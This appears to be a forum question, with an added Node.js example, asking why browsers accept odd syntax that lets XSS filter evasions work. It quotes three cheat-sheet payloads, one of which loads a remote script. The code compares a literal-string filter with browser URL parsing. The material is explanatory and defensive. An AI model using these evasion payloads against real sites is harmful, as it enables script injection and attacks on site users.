Reading the XSS Filter Evasion Cheat Sheet, I have realized that many of the XSS filter evasions are due to particular and strange behaviors that are hidden from common developers.
In particular, the following XSS filter evasion techniques have struck me:
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^=alert("XSS")>
<a href="jav	ascript:alert('XSS');">Click Me</a>
The point is: why do modern web browsers allow such things? For example, why allow strange characters in the middle of the javascript: directive instead of just sticking to it? I've never seen a developer write jav	ascript: instead of javascript:.
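Added example, not part of the question: a small Node.js check of why a filter that looks for the literal string javascript: misses the tab-split href above, while the WHATWG URL parser that browsers apply to href values (Node's global URL) strips ASCII tab, LF and CR and matches the scheme case-insensitively, so the same href is recognized. The base host and the sample hrefs are constructed placeholders.

```javascript
// Added example (not from the question): a naive string filter beside a
// browser-like check. Runs on Node.js using the global WHATWG URL class.

// Naive filter: looks for the literal prefix "javascript:" after trimming.
function naiveIsJavascriptUrl(href) {
  return href.trim().toLowerCase().startsWith("javascript:");
}

// Browser-like check: the WHATWG URL parser strips leading and trailing C0
// controls and spaces, removes every ASCII tab, LF and CR from the input,
// and lowercases the scheme before deciding what kind of URL it is.
// A base URL is needed so relative hrefs such as "/page" parse instead of
// throwing; the base host is a placeholder.
function browserIsJavascriptUrl(href, base = "https://example.invalid/") {
  try {
    return new URL(href, base).protocol === "javascript:";
  } catch (e) {
    // Unparsable href: the browser would not navigate it, so not javascript:
    return false;
  }
}

// Constructed sample hrefs, including the tab-split form from the cheat sheet.
const SAMPLES = [
  "javascript:alert('XSS')",
  "jav\tascript:alert('XSS')",
  " \n JaVaScRiPt:alert('XSS')",
  "https://example.invalid/page",
  "/relative/page",
];

// Classify each href with both checks so the gap between them is visible.
function classify(hrefs = SAMPLES) {
  return hrefs.map((href) => ({
    href,
    naive: naiveIsJavascriptUrl(href),
    browser: browserIsJavascriptUrl(href),
  }));
}

for (const r of classify()) {
  console.log(JSON.stringify(r.href), "naive:", r.naive, "browser:", r.browser);
}
```

The tab-split href is the one row where the two columns disagree, which is exactly the gap a literal-string filter leaves open.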